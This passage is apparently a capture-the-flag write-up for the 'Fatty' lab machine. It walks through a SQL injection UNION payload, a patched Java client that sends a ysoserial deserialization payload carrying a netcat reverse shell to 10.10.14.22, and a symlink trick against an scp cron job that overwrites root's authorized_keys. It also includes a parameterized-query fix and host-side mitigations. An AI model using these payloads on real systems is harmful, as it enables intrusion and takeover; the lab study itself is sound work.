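    query = "SELECT id,username,email,password,role FROM users WHERE username='" + username + "'"
    row = db.execute(query).fetchone()
    if row is None or row[3] != sent_password:
        return None
    return row[4]


def safe_check_login(db, username, sent_password):
    """Same lookup with a bound parameter: the payload is just a username that does not exist."""
    row = db.execute("SELECT id,username,email,password,role FROM users WHERE username=?",
                     (username,)).fetchone()
    if row is None or row[3] != sent_password:
        return None
    return row[4]


def union_payload(password_column):
    """The username from the page; password_column is what the injected row carries as its password."""
    return "abc' UNION SELECT 1,'abc','a@b.com','" + password_column + "','admin"
```

Run `vulnerable_check_login(make_users_db(), union_payload("abc"), "abc")` to get 'admin' with a client that sends the raw password, and swap in `client_hash(union_payload("abc"), "abc")` as the sent value to see the unpatched client fail.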

Deserialization

After logging in, the change-password feature deserializes its argument:

References:

The change-password feature is not fully implemented in the client, so the code has to be patched in by hand

Adding the feature

First modify the changePW method so that it sends the payload:

public String changePW(String payload) throws MessageParseException, MessageBuildException, IOException {
    // Send the attacker-controlled string as the single argument of a changePW action.
    this.action = new ActionMessage(this.sessionID, "changePW");
    this.action.addArgument(payload);
    sendAndRecv();
    if (this.response.hasError()) {
        return "Error: Your action caused an error on the application server!";
    }
    return this.response.getContentAsString();
}

Then modify the button handler that triggers changePW:

jButton4.addActionListener(new ActionListener() {
    public void actionPerformed(ActionEvent param1ActionEvent) {
        String str1 = "";
        // The text field now carries the serialized payload instead of a new password.
        String str2 = ClientGuiTest.this.textField_1.getText();
        try {
            str1 = ClientGuiTest.this.invoker.changePW(str2);
        } catch (MessageBuildException | htb.fatty.shared.message.MessageParseException messageException) {
            JOptionPane.showMessageDialog(controlPanel, "Failure during message building/parsing.", "Error", 0);
        } catch (IOException iOException) {
            JOptionPane.showMessageDialog(controlPanel, "Unable to contact the server. If this problem remains, please close and reopen the client.", "Error", 0);
        }
        textPane.setText(str1);
        passwordChange.setVisible(false);
        controlPanel.setVisible(true);
    }
});

I accidentally deleted the modified jar at this point and did not want to start over and redo the changes bit by bit, so what follows is mainly just the flow

Deserialization getshell

Then generate the serialized payload, listen on a port, send the payload through the change-password function, and get a shell:

java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections5 'nc 10.10.14.22 7777 -e /bin/sh' | base64 -w 0

user flag

The deserialization gives a shell as user qtc; user.txt is not readable, so just add read permission and get the user flag:

chmod +r user.txt
cat user.txt
7fab****2073

Privilege escalation information

This step involves a cron job, which does roughly:

scp qtc@<container_ip>:/opt/fatty/tar/logs.tar /unknown/location/logs.tar

The trick is a symlink. Build a tar archive at /opt/fatty/tar/logs.tar whose only member is a symlink named logs.tar pointing at /root/.ssh/authorized_keys. The cron job copies the archive to the host and extracts it there, so the extracted symlink replaces the host's own copy of logs.tar:

/unknown/location/logs.tar -> /root/.ssh/authorized_keys

Next, overwrite /opt/fatty/tar/logs.tar with a file containing our public key and wait for the next backup run: scp writes through the symlink and overwrites the host's /root/.ssh/authorized_keys.

Then we can simply log in with our own private key:
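The two cron cycles above, as an added Python simulation in a scratch directory (not the author's code and not the real host job, whose exact command is unknown). scp is stood in for by a byte copy, which like scp follows an existing symlink at the destination; the extraction loop creates symlink members verbatim and replaces whatever sits at that path, as a plain `tar xf` does. The key string is a constructed placeholder.

```python
import io
import os
import shutil
import tarfile
import tempfile

# Constructed placeholder for the demo, not a real key.
ATTACKER_KEY = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERKEYFORDEMOONLY attacker@example\n"


def build_symlink_tar(member_name, link_target):
    """Stage 1 payload: an archive whose only member is a symlink member_name -> link_target."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo(member_name)
        info.type = tarfile.SYMTYPE
        info.linkname = link_target
        tar.addfile(info)
    return buf.getvalue()


def host_backup_job(container_logs_tar, host_dir):
    """Model of the host-side cron job inferred on this page: fetch logs.tar, then unpack it in
    host_dir. The copy writes through an existing symlink at the destination (scp does the same);
    symlink members are created as-is, replacing whatever is at that path; files are written out."""
    dest = os.path.join(host_dir, "logs.tar")
    with open(container_logs_tar, "rb") as src, open(dest, "wb") as dst:
        dst.write(src.read())
    try:
        with tarfile.open(dest) as tar:
            for member in tar:
                path = os.path.join(host_dir, member.name)
                if member.issym():
                    if os.path.lexists(path):
                        os.unlink(path)
                    os.symlink(member.linkname, path)
                elif member.isfile():
                    with open(path, "wb") as out:
                        out.write(tar.extractfile(member).read())
    except tarfile.TarError:
        pass  # stage 2 delivers a public key, not an archive: the job fails, but the copy already ran


def simulate_fatty_privesc():
    """Run both cron cycles in a scratch tree; return whether the host's logs.tar became the
    symlink and what the host's authorized_keys contains afterwards."""
    tmp = tempfile.mkdtemp()
    try:
        ssh_dir = os.path.join(tmp, "root", ".ssh")
        host_dir = os.path.join(tmp, "backups")              # the page's /unknown/location
        tar_dir = os.path.join(tmp, "opt", "fatty", "tar")   # the container's /opt/fatty/tar
        for d in (ssh_dir, host_dir, tar_dir):
            os.makedirs(d)
        authorized_keys = os.path.join(ssh_dir, "authorized_keys")
        with open(authorized_keys, "w") as f:
            f.write("ssh-ed25519 AAAA...original root key...\n")
        logs_tar = os.path.join(tar_dir, "logs.tar")

        # Cycle 1: ship the symlink archive; after extraction the host's logs.tar *is* the symlink.
        with open(logs_tar, "wb") as f:
            f.write(build_symlink_tar("logs.tar", authorized_keys))
        host_backup_job(logs_tar, host_dir)
        host_copy_is_link = os.path.islink(os.path.join(host_dir, "logs.tar"))

        # Cycle 2: ship the public key as "logs.tar"; the copy follows the link into authorized_keys.
        with open(logs_tar, "w") as f:
            f.write(ATTACKER_KEY)
        host_backup_job(logs_tar, host_dir)
        with open(authorized_keys) as f:
            return host_copy_is_link, f.read()
    finally:
        shutil.rmtree(tmp)
```

The second run never unpacks anything, but by then the copy has already written through the link. On the host side the fixes are to refuse symlink members when unpacking an archive pulled from a less trusted machine, and to write the fetched file to a fresh temporary name (or open with O_NOFOLLOW) instead of through whatever logs.tar currently is.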

root flag

After logging in, read root.txt directly:

ee98****d9c7

References